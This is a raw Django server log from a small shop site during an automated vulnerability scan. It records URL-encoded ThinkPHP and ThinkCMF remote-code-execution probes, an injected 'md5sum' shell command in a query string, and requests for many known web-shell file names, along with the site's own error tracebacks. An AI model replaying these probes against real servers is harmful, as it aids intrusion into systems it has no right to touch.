HTTP/1.0" 404 6450 Not Found: /pma/scripts/db___.init.php [01/Dec/2019 18:23:24] "GET /pma/scripts/db___.init.php HTTP/1.0" 404 6453 Not Found: /PMA/scripts/db___.init.php [01/Dec/2019 18:23:24] "GET /PMA/scripts/db___.init.php HTTP/1.0" 404 6453 Not Found: /myadmin/scripts/db___.init.php [01/Dec/2019 18:23:24] "GET /myadmin/scripts/db___.init.php HTTP/1.0" 404 6465 Not Found: /MyAdmin/scripts/db___.init.php [01/Dec/2019 18:23:25] "GET /MyAdmin/scripts/db___.init.php HTTP/1.0" 404 6465 Not Found: /plugins/weathermap/editor.php [01/Dec/2019 18:23:26] "GET /plugins/weathermap/editor.php HTTP/1.0" 404 6462 Not Found: /cacti/plugins/weathermap/editor.php [01/Dec/2019 18:23:26] "GET /cacti/plugins/weathermap/editor.php HTTP/1.0" 404 6480 Not Found: /weathermap/editor.php [01/Dec/2019 18:23:26] "GET /weathermap/editor.php HTTP/1.0" 404 6438 Not Found: /index.php [01/Dec/2019 18:23:27] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6649 Not Found: /elrekt.php [01/Dec/2019 18:23:27] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6652 DEBUG 2019-12-01 18:23:28,111 utils 26999 140702511523584 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App'; args=('App',) DEBUG 2019-12-01 18:23:28,175 utils 26999 140702511523584 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-12-01 18:23:28,176 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-12-01 18:23:28,177 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-12-01 18:23:28,178 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App' LIMIT 21; args=('App',) DEBUG 2019-12-01 18:23:28,179 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-12-01 18:23:28,180 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App' LIMIT 21; args=('App',) DEBUG 2019-12-01 18:23:28,181 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App' LIMIT 21; args=('App',) DEBUG 2019-12-01 18:23:28,182 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App' LIMIT 21; args=('App',) Internal Server Error: /App/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [01/Dec/2019 18:23:28] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.0" 500 131838 Not Found: /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} [01/Dec/2019 18:23:28] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6553 Not Found: /index.php [01/Dec/2019 18:23:29] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6458 [01/Dec/2019 18:23:29] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 [01/Dec/2019 18:23:29] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-01 18:23:30,011 utils 26999 140702511523584 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla'; args=('joomla',) DEBUG 2019-12-01 18:23:30,035 utils 26999 140702511523584 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-12-01 18:23:30,036 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-12-01 18:23:30,037 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-12-01 18:23:30,038 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) DEBUG 2019-12-01 18:23:30,039 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-12-01 18:23:30,040 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) DEBUG 2019-12-01 18:23:30,041 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) DEBUG 2019-12-01 18:23:30,042 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) Internal Server Error: /joomla/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [01/Dec/2019 18:23:30] "GET /joomla/ HTTP/1.0" 500 131385 DEBUG 2019-12-01 18:23:30,549 utils 26999 140702511523584 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla'; args=('Joomla',) DEBUG 2019-12-01 18:23:30,573 utils 26999 140702511523584 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-12-01 18:23:30,574 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-12-01 18:23:30,575 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-12-01 18:23:30,576 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla' LIMIT 21; args=('Joomla',) DEBUG 2019-12-01 18:23:30,577 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-12-01 18:23:30,577 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla' LIMIT 21; args=('Joomla',) DEBUG 2019-12-01 18:23:30,578 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla' LIMIT 21; args=('Joomla',) DEBUG 2019-12-01 18:23:30,579 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla' LIMIT 21; args=('Joomla',) Internal Server Error: /Joomla/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [01/Dec/2019 18:23:30] "GET /Joomla/ HTTP/1.0" 500 131384 [01/Dec/2019 18:23:31] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.0" 302 0 Not Found: /d7.php [01/Dec/2019 18:23:31] "GET /d7.php HTTP/1.0" 404 6393 Not Found: /rxr.php [01/Dec/2019 18:23:31] "GET /rxr.php HTTP/1.0" 404 6396 Not Found: /1x.php [01/Dec/2019 18:23:32] "GET /1x.php HTTP/1.0" 404 6393 Not Found: /home.php [01/Dec/2019 18:23:32] "GET /home.php HTTP/1.0" 404 6399 Not Found: /undx.php [01/Dec/2019 18:23:33] "GET /undx.php HTTP/1.0" 404 6399 Not Found: /spider.php [01/Dec/2019 18:23:33] "GET /spider.php HTTP/1.0" 404 6405 Not Found: /payload.php [01/Dec/2019 18:23:34] "GET /payload.php HTTP/1.0" 404 6408 Not Found: /composers.php [01/Dec/2019 18:23:35] "GET /composers.php HTTP/1.0" 404 6414 Not Found: /izom.php [01/Dec/2019 18:23:35] "GET /izom.php HTTP/1.0" 404 6399 Not Found: /composer.php [01/Dec/2019 18:23:35] "GET /composer.php HTTP/1.0" 404 6411 Not Found: /hue2.php [01/Dec/2019 18:23:38] "GET /hue2.php HTTP/1.0" 404 6399 Not Found: /Drupal.php [01/Dec/2019 18:23:38] "GET /Drupal.php HTTP/1.0" 404 6405 Not Found: /lang.php [01/Dec/2019 18:23:39] "GET /lang.php?f=1 HTTP/1.0" 404 6403 Not Found: /izom.php [01/Dec/2019 18:23:40] "GET /izom.php HTTP/1.0" 404 6399 Not Found: /payload.php [01/Dec/2019 18:23:40] "GET /payload.php HTTP/1.0" 404 6408 Not Found: /new_license.php [01/Dec/2019 18:23:40] "GET /new_license.php HTTP/1.0" 404 6420 Not Found: /images/vuln.php [01/Dec/2019 18:23:41] "GET /images/vuln.php HTTP/1.0" 404 6420 Not Found: /hd.php [01/Dec/2019 18:23:42] "GET /hd.php HTTP/1.0" 404 6393 Not Found: /images/up.php [01/Dec/2019 18:23:42] "GET /images/up.php HTTP/1.0" 404 6414 Not Found: /images/attari.php [01/Dec/2019 18:23:42] "GET /images/attari.php HTTP/1.0" 404 6426 Not Found: /images/stories/cmd.php [01/Dec/2019 18:23:45] "GET /images/stories/cmd.php HTTP/1.0" 404 6441 Not Found: /images/stories/filemga.php [01/Dec/2019 18:23:46] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.0" 404 6464 Not Found: /up.php [01/Dec/2019 18:23:47] "GET /up.php HTTP/1.0" 404 6393 Not Found: /laravel.php [01/Dec/2019 18:23:47] "GET /laravel.php HTTP/1.0" 404 6408 Not Found: /huoshan.php [01/Dec/2019 18:23:47] "GET /huoshan.php HTTP/1.0" 404 6408 Not Found: /yu.php [01/Dec/2019 18:23:48] "GET /yu.php HTTP/1.0" 404 6393 Not Found: /floaw.php [01/Dec/2019 18:23:48] "GET /floaw.php HTTP/1.0" 404 6402 Not Found: /ftmabc.php [01/Dec/2019 18:23:49] "GET /ftmabc.php HTTP/1.0" 404 6405 Not Found: /doudou.php [01/Dec/2019 18:23:49] "GET /doudou.php HTTP/1.0" 404 6405 Not Found: /mjx.php [01/Dec/2019 18:23:50] "GET /mjx.php HTTP/1.0" 404 6396 Not Found: /xiaoxia.php [01/Dec/2019 18:23:50] "GET /xiaoxia.php HTTP/1.0" 404 6408 Not Found: /zz.php [01/Dec/2019 18:23:53] "GET /zz.php HTTP/1.0" 404 6393 Not Found: /coonig.php [01/Dec/2019 18:23:54] "GET /coonig.php HTTP/1.0" 404 6405 Not Found: /ak.php [01/Dec/2019 18:23:54] "GET /ak.php HTTP/1.0" 404 6393 Not Found: /baidoubi.php [01/Dec/2019 18:23:54] "GET /baidoubi.php HTTP/1.0" 404 6411 Not Found: /hhhhhh.php [01/Dec/2019 18:23:55] "GET /hhhhhh.php HTTP/1.0" 404 6405 Not Found: /meijianxue.php [01/Dec/2019 18:23:55] "GET /meijianxue.php HTTP/1.0" 404 6417 Not Found: /no1.php [01/Dec/2019 18:23:56] "GET /no1.php HTTP/1.0" 404 6396 Not Found: /python.php [01/Dec/2019 18:23:56] "GET /python.php HTTP/1.0" 404 6405 Not Found: /woshimengmei.php [01/Dec/2019 18:23:56] "GET /woshimengmei.php HTTP/1.0" 404 6423 Not Found: /taisui.php [01/Dec/2019 18:23:57] "GET /taisui.php HTTP/1.0" 404 6405 Not Found: /xiaxia.php [01/Dec/2019 18:23:58] "GET /xiaxia.php HTTP/1.0" 404 6405 Not Found: /kk.php [01/Dec/2019 18:23:58] "GET /kk.php HTTP/1.0" 404 6393 Not Found: /xsser.php [01/Dec/2019 18:23:58] "GET /xsser.php HTTP/1.0" 404 6402 Not Found: /zzz.php [01/Dec/2019 18:23:59] "GET /zzz.php HTTP/1.0" 404 6396 Not Found: /99.php [01/Dec/2019 18:23:59] "GET /99.php HTTP/1.0" 404 6393 Not Found: /dp.php [01/Dec/2019 18:24:00] "GET /dp.php HTTP/1.0" 404 6393 Not Found: /hs.php [01/Dec/2019 18:24:00] "GET /hs.php HTTP/1.0" 404 6393 Not Found: /1ts.php [01/Dec/2019 18:24:00] "GET /1ts.php HTTP/1.0" 404 6396 Not Found: /phpdm.php [01/Dec/2019 18:24:01] "GET /phpdm.php HTTP/1.0" 404 6402 Not Found: /root.php [01/Dec/2019 18:24:02] "GET /root.php HTTP/1.0" 404 6399 Not Found: /5678.php [01/Dec/2019 18:24:03] "GET /5678.php HTTP/1.0" 404 6399 Not Found: /root11.php [01/Dec/2019 18:24:03] "GET /root11.php HTTP/1.0" 404 6405 Not Found: /xiu.php [01/Dec/2019 18:24:03] "GET /xiu.php HTTP/1.0" 404 6396 Not Found: /wuwu11.php [01/Dec/2019 18:24:04] "POST /wuwu11.php HTTP/1.0" 404 6406 Not Found: /xw.php [01/Dec/2019 18:24:04] "POST /xw.php HTTP/1.0" 404 6394 Not Found: /xw1.php [01/Dec/2019 18:24:05] "POST /xw1.php HTTP/1.0" 404 6397 Not Found: /9678.php [01/Dec/2019 18:24:05] "POST /9678.php HTTP/1.0" 404 6400 Not Found: /wc.php [01/Dec/2019 18:24:06] "POST /wc.php HTTP/1.0" 404 6394 Not Found: /xx.php [01/Dec/2019 18:24:07] "POST /xx.php HTTP/1.0" 404 6394 Not Found: /xx.php [01/Dec/2019 18:24:07] "POST /xx.php HTTP/1.0" 404 6394 Not Found: /s.php [01/Dec/2019 18:24:07] "POST /s.php HTTP/1.0" 404 6391 Not Found: /w.php [01/Dec/2019 18:24:08] "POST /w.php HTTP/1.0" 404 6391 Not Found: /sheep.php [01/Dec/2019 18:24:08] "POST /sheep.php HTTP/1.0" 404 6403 Not Found: /qaq.php [01/Dec/2019 18:24:09] "POST /qaq.php HTTP/1.0" 404 6397 Not Found: /my.php [01/Dec/2019 18:24:09] "POST /my.php HTTP/1.0" 404 6394 Not Found: /qq.php [01/Dec/2019 18:24:10] "POST /qq.php HTTP/1.0" 404 6394 Not Found: /aaa.php [01/Dec/2019 18:24:10] "POST /aaa.php HTTP/1.0" 404 6397 Not Found: /hhh.php [01/Dec/2019 18:24:10] "POST /hhh.php HTTP/1.0" 404 6397 Not Found: /jjj.php [01/Dec/2019 18:24:11] "POST /jjj.php HTTP/1.0" 404 6397 Not Found: /vvv.php [01/Dec/2019 18:24:11] "POST /vvv.php HTTP/1.0" 404 6397 Not Found: /www.php [01/Dec/2019 18:24:12] "POST /www.php HTTP/1.0" 404 6397 Not Found: /ffr.php [01/Dec/2019 18:24:14] "POST /ffr.php HTTP/1.0" 404 6397 Not Found: /411.php [01/Dec/2019 18:24:14] "POST /411.php HTTP/1.0" 404 6397 Not Found: /415.php [01/Dec/2019 18:24:15] "POST /415.php HTTP/1.0" 404 6397 Not Found: /421.php [01/Dec/2019 18:24:15] "POST /421.php HTTP/1.0" 404 6397 Not Found: /444.php [01/Dec/2019 18:24:16] "POST /444.php HTTP/1.0" 404 6397 Not Found: /a411.php [01/Dec/2019 18:24:17] "POST /a411.php HTTP/1.0" 404 6400 Not Found: /whoami.php [01/Dec/2019 18:24:17] "POST /whoami.php HTTP/1.0" 404 6406 Not Found: /whoami.php.php [01/Dec/2019 18:24:18] "POST /whoami.php.php HTTP/1.0" 404 6418 Not Found: /9.php [01/Dec/2019 18:24:19] "POST /9.php HTTP/1.0" 404 6391 Not Found: /98k.php [01/Dec/2019 18:24:19] "POST /98k.php HTTP/1.0" 404 6397 Not Found: /981.php [01/Dec/2019 18:24:19] "POST /981.php HTTP/1.0" 404 6397 Not Found: /887.php [01/Dec/2019 18:24:20] "POST /887.php HTTP/1.0" 404 6397 Not Found: /888.php [01/Dec/2019 18:24:20] "POST /888.php HTTP/1.0" 404 6397 Not Found: /aa.php [01/Dec/2019 18:24:21] "POST /aa.php HTTP/1.0" 404 6394 Not Found: /bb.php [01/Dec/2019 18:24:21] "POST /bb.php HTTP/1.0" 404 6394 Not Found: /pp.php [01/Dec/2019 18:24:22] "POST /pp.php HTTP/1.0" 404 6394 Not Found: /tt.php [01/Dec/2019 18:24:22] "POST /tt.php HTTP/1.0" 404 6394 Not Found: /bbq.php [01/Dec/2019 18:24:22] "POST /bbq.php HTTP/1.0" 404 6397 Not Found: /jj1.php [01/Dec/2019 18:24:23] "POST /jj1.php HTTP/1.0" 404 6397 Not Found: /jbb.php [01/Dec/2019 18:24:23] "POST /jbb.php HTTP/1.0" 404 6397 Not Found: /7o.php [01/Dec/2019 18:24:24] "POST /7o.php HTTP/1.0" 404 6394 Not Found: /qwq.php [01/Dec/2019 18:24:24] "POST /qwq.php HTTP/1.0" 404 6397 Not Found: /nb.php [01/Dec/2019 18:24:24] "POST /nb.php HTTP/1.0" 404 6394 Not Found: /hgx.php [01/Dec/2019 18:24:26] "POST /hgx.php HTTP/1.0" 404 6397 Not Found: /ppl.php [01/Dec/2019 18:24:27] "POST /ppl.php HTTP/1.0" 404 6397 Not Found: /tty.php [01/Dec/2019 18:24:27] "POST /tty.php HTTP/1.0" 404 6397 Not Found: /ooi.php [01/Dec/2019 18:24:27] "POST /ooi.php HTTP/1.0" 404 6397 Not Found: /aap.php [01/Dec/2019 18:24:28] "POST /aap.php HTTP/1.0" 404 6397 Not Found: /app.php [01/Dec/2019 18:24:28] "POST /app.php HTTP/1.0" 404 6397 Not Found: /bbr.php [01/Dec/2019 18:24:29] "POST /bbr.php HTTP/1.0" 404 6397 Not Found: /ioi.php [01/Dec/2019 18:24:29] "POST /ioi.php HTTP/1.0" 404 6397 Not Found: /uuu.php [01/Dec/2019 18:24:30] "POST /uuu.php HTTP/1.0" 404 6397 Not Found: /yyy.php [01/Dec/2019 18:24:30] "POST /yyy.php HTTP/1.0" 404 6397 Not Found: /ack.php [01/Dec/2019 18:24:30] "POST /ack.php HTTP/1.0" 404 6397 Not Found: /shh.php [01/Dec/2019 18:24:31] "POST /shh.php HTTP/1.0" 404 6397 Not Found: /ddd.php [01/Dec/2019 18:24:31] "POST /ddd.php HTTP/1.0" 404 6397 Not Found: /nnn.php [01/Dec/2019 18:24:32] "POST /nnn.php HTTP/1.0" 404 6397 Not Found: /rrr.php [01/Dec/2019 18:24:32] "POST /rrr.php HTTP/1.0" 404 6397 Not Found: /ttt.php [01/Dec/2019 18:24:33] "POST /ttt.php HTTP/1.0" 404 6397 Not Found: /bbqq.php [01/Dec/2019 18:24:34] 